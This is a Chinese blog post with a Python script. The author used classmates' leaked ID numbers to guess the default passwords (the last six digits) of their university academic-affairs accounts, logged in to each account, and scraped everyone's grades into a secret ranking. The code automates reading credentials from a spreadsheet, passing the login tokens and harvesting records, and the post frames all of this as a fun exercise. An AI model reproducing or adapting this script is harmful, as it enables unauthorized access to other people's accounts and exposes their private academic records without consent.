刚开学时班长发了每个人的身份证号码,被别有用心的boy存到了本地。教务处密码是身份证后六位,然后我就悄悄地(偷偷地)制作了一张均分排名(⊙v⊙)。
过程中学习了模拟登陆以及正则表达式的基本应用。本来是用库urllib的,结果遇到重定向302问题不会提取响应报文,然后就用了第三方库requests(顺便解决了编码问题). 还加入了第三方库xlrd用来读取本地的excel.
代码如下:
1 # -*- coding: utf-8 -*- 2 import re 3 import xlrd 4 change_sum = 0 #用以存储密码修改的人数 5 grade_course = ['*************'] 用以存储计算均分的科目 6 class course(): 7 '''the class of course''' 8 def __init__(self,L): 9 self.name = L[2] #学科名称 10 self.credit = L[3] #学科学分 11 self.grade = L[8] #学科分数 12 self.rank = L[9] #学科排名 13 class person(): 14 '''the class of person''' 15 def __init__(self,name,S): 16 self.name = name 17 self.courses = S 18 Grade = 0 19 Credit = 0 20 for key,value in S.items(): 21 global grade_course 22 if key in grade_course: 23 try: 24 t = float(value.grade) 25 Credit += float(value.credit) 26 Grade += t*float(value.credit) 27 except: 28 pass 29 self.average = Grade/Credit #均分 30 def save(Path,Data): 31 '''save Data in Path''' 32 file_obj = open(Path,'a') 33 try: 34 file_obj.write(Data) 35 finally: 36 file_obj.close() 37 def gettext(username,password): 38 '''input username & password, return marks text''' 39 import requests 40 41 def getlt(data): 42 '''获取学校教务处hidden的参数lt''' 43 cer = re.findall('(?<=name="lt" value=").+?(?=")',data) 44 return cer[0] 45 def getexecution(data): 46 '''获取学校教务处hidden的参数execution''' 47 cer = re.findall('(?<=name="execution" value=").+?(?=")', data) 48 return cer[0] 49 50 header = { #伪装浏览器 51 'Connection' : 'Keep-Alive', 52 'Accept-Language' : 'zh-CN', 53 'Accept' : 'image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*', 54 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; Tablet PC 2.0; GWX:DOWNLOADED; GWX:RESERVED; GWX:QUALIFIED; SMJB)', 55 'Accept-Encoding' : 'gzip, deflate', 56 'Host' : '*********', 57 'DNT': '1' 58 } 59 60 url = '**********' #学校教务处网址 61 s = requests.session() #保存cookies 62 r = s.get(url,headers=header) 63 64 lt = getlt(r.text) 65 execution = getexecution(r.text) 66 payload = { #构造请求头 67 'username' : username, 68 'password': password, 69 'submit' : '', 70 'lt' : lt, 71 'execution' : execution, 72 '_eventId' : 'submit', 73 'rmShown' : '1' 74 } 75 76 login = s.post(url,data=payload,headers=header) 77 78 if login.status_code == 200: 79 print('%s login success!'%name) 80 temp = s.get('**************',headers=header) 81 preurl = '**************' 82 dox = '************' #存放成绩的地址 83 newurl = preurl + dox 84 temp = s.get(newurl,headers=header) 85 return temp.text 86 else: 87 print('%s login failed, login.status_code:'%name+login.status_code) 88 return '' 89 def textanal(name,text): 90 '''analysis the text of name, and save its grades''' 91 if text : 92 prepath = '***********' #保存个人成绩的地址 93 path = prepath + name +'.txt' 94 95 #从网页中获取成绩 96 marks = text.split('''<tr class="odd" onMouseOut="this.className='even';" onMouseOver="this.className='evenfocus';">''') 97 courses = {} 98 n = 0 99 for cours in marks: 100 if n > 0 : 101 L = re.findall('(?<=s)[^<|s][^>]*?(?=s)',cours) 102 if len(L) >= 10 : 103 while len(L) > 10 : 104 del L[3] 105 key = L[2] 106 value = course(L) 107 save(path,' '.join(L)+' ') 108 courses[key] = value 109 elif len(L) != 10 : 110 print('Error : wrong course') 111 n += 1 112 if courses : 113 one = person(name,courses) 114 path = prepath + 'allmarks.txt' 115 save(path,name+' '+str(one.average)+' ') #记录此人均分 116 else : 117 global change_sum 118 change_sum += 1 119 print('%s password changed or exist verification code!'%name) 120 121 #读取每个人的username和password 122 book = xlrd.open_workbook('************') 123 sheet = book.sheet_by_index(0) 124 nrows = sheet.nrows 125 for x in range(nrows): 126 row = sheet.row_values(x) 127 name = row[5] 128 username = row[2] 129 password = row[15][-6:] 130 text = gettext(username,password) 131 textanal(name,text) 132 print(change_sum) #输出修改密码的人的个数
最后用excel处理下数据就好啦!
然而最后发现修改了密码的人好少= =只有个位数